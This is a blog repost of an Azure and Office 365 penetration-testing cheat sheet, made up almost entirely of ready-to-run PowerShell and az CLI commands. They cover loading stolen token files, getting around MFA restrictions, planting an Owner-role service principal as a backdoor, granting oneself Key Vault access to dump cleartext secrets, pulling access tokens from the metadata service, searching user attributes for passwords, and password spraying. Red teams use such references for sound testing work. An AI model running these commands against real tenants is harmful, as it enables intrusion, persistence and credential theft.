Azure Penetration Testing Cheat sheet
Eng Soon Cheah
Posted on February 5, 2021
Microsoft Azure & O365 CLI Tool Cheatsheet
By Beau Bullock (@dafthack)
Az PowerShell Module
Import-Module Az
Authentication
Connect-AzAccount
## Or this way sometimes gets around MFA restrictions
$credential = Get-Credential
Connect-AzAccount -Credential $credential
Import a context file
Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json'
Export a context file
Save-AzContext -Path C:\Temp\AzureAccessToken.json
Account Information
List the current Azure contexts available
Get-AzContext -ListAvailable
Get context details
$context = Get-AzContext
$context.Name
$context.Account
List subscriptions
Get-AzSubscription
Choose a subscription
Select-AzSubscription -SubscriptionID "SubscriptionID"
Get the current user's role assignment
Get-AzRoleAssignment
List all resources and resource groups
Get-AzResource
Get-AzResourceGroup
List storage accounts
Get-AzStorageAccount
WebApps & SQL
List Azure web applications
Get-AzAdApplication
Get-AzWebApp
List SQL servers
Get-AzSQLServer
Individual databases can be listed with information retrieved from the previous command
Get-AzSqlDatabase -ServerName $ServerName -ResourceGroupName $ResourceGroupName
List SQL Firewall rules
Get-AzSqlServerFirewallRule –ServerName $ServerName -ResourceGroupName $ResourceGroupName
List SQL Server AD Admins
Get-AzSqlServerActiveDirectoryAdminstrator -ServerName $ServerName -ResourceGroupName $ResourceGroupName
Runbooks
List Azure Runbooks
Get-AzAutomationAccount
Get-AzAutomationRunbook -AutomationAccountName <AutomationAccountName> -ResourceGroupName <ResourceGroupName>
Export a runbook with:
Export-AzAutomationRunbook -AutomationAccountName $AccountName -ResourceGroupName $ResourceGroupName -Name $RunbookName -OutputFolder .\Desktop\
Virtual Machines
List VMs and get OS details
Get-AzVM
$vm = Get-AzVM -Name "VM Name"
$vm.OSProfile
Run commands on VMs
Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName -CommandId RunPowerShellScript -ScriptPath ./powershell-script.ps1
Networking
List virtual networks
Get-AzVirtualNetwork
List public IP addresses assigned to virtual NICs
Get-AzPublicIpAddress
Get Azure ExpressRoute (VPN) Info
Get-AzExpressRouteCircuit
Backdoors
Create a new Azure service principal as a backdoor
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$spn
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$UnsecureSecret
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
#Enter the AppID as username and what was returned for $UnsecureSecret as the password in the Get-Credential prompt
$cred = Get-Credential
Connect-AzAccount -Credential $cred -Tenant “tenant ID" -ServicePrincipal
MSOnline PowerShell Module
Import-Module MSOnline
Authentication
Connect-MsolService
## Or this way sometimes gets around MFA restrictions
$credential = Get-Credential
Connect-MsolService -Credential $credential
Account and Directory Information
List Company Information
Get-MSolCompanyInformation
List all users
Get-MSolUser -All
List all groups
Get-MSolGroup -All
List members of a group (Global Admins in this case)
Get-MsolRole -RoleName "Company Administrator"
Get-MSolGroupMember –GroupObjectId $GUID
List all user attributes
Get-MSolUser –All | fl
List Service Principals
Get-MsolServicePrincipal
One-liner to search all Azure AD user attributes for passwords
$users = Get-MsolUser; foreach($user in $users){$props = @();$user | Get-Member | foreach-object{$props+=$_.Name}; foreach($prop in $props){if($user.$prop -like "*password*"){Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)}}}
Az CLI Tool
Authentication
az login
Dump Azure Key Vaults
List out any key vault resources the current account can view
az keyvault list –query '[].name' --output tsv
With contributor level access you can give yourself the right permissions to obtain secrets.
az keyvault set-policy --name <KeyVaultname> --upn <YourContributorUsername> --secret-permissions get list --key-permissions get list --storage-permissions get list --certificate-permissions get list
Get URI for Key Vault
az keyvault secret list --vault-name <KeyVaultName> --query '[].id' --output tsv
Get cleartext secret from keyvault
az keyvault secret show --id <URI from last command> | ConvertFrom-Json
Metadata Service URL
http://169.254.169.254/metadata
Get access tokens from the metadata service
GET 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' HTTP/1.1 Metadata: true
Other Azure & O365 Tools
MicroBurst
Azure security assessment tool
https://github.com/NetSPI/MicroBurst
Look for open storage blobs
Invoke-EnumerateAzureBlobs -Base $BaseName
Export SSL/TLS certs
Get-AzPasswords -ExportCerts Y
Azure Container Registry dump
Get-AzPasswords
Get-AzACR
PowerZure
Azure security assessment tool
https://github.com/hausec/PowerZure
ROADTools
Framework to interact with Azure AD
https://github.com/dirkjanm/ROADtools
Stormspotter
Red team tool for graphing Azure and Azure AD objects
https://github.com/Azure/Stormspotter
MSOLSpray
Tool to password spray Azure/O365
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020
Posted on February 5, 2021
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.